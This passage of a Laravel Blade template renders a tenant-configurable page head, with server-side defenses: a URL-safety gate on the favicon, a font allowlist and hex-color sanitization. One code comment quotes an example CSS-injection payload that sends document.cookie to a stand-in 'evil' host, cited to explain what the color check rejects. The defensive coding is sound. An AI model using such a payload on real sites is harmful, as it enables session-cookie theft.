@if($page->meta_description) @endif @if($page->og_image_url) @endif @if($page->favicon_url && \App\Support\UrlSafety::isSafeExternalUrl($page->favicon_url)) {{-- Fix note: favicon_url is tenant-typed. Blade {{ }} doesn't block javascript: scheme — gate the entire behind UrlSafety. --}} @endif @if($page->meta_description) @endif @php // CSS-context defense: // font-family: tenant Select::make — but Livewire client validation // is bypass-able. Server-side allowlist enforcement here ensures // the rendered CSS is safe even if a malicious request stored an // arbitrary $page->font_family. // --primary / --bg: ColorSafety::safeHex rejects CSS-injection // payloads like `red; }; body{background:url(//evil/?'+document.cookie+');`. $allowedFonts = ['Inter', 'System', 'Roboto', 'Open Sans', 'Lato', 'Poppins', 'Montserrat', 'Nunito']; $fontFamily = in_array($page->font_family, $allowedFonts, true) ? $page->font_family : 'Inter'; $isInter = $fontFamily === 'Inter'; $fontStack = $fontFamily === 'System' ? '-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif' : "'{$fontFamily}',sans-serif"; $safePrimaryColor = \App\Support\ColorSafety::safeHex($page->primary_color, '#4f46e5'); $safeBgColor = \App\Support\ColorSafety::safeHex($page->background_color, '#ffffff'); @endphp {{-- Inter is self-hosted under public/vendor/ (no CDN). Other font names selected by the tenant (Roboto / Open Sans / Lato / Poppins) gracefully fall back to the system sans-serif stack — buyers who want those fonts can self-host them and extend this template. --}} @if($isInter) @endif @if($page->custom_css) @endif {{-- Static rules for this view (success-flash banner) live in the per-view stylesheet. The inline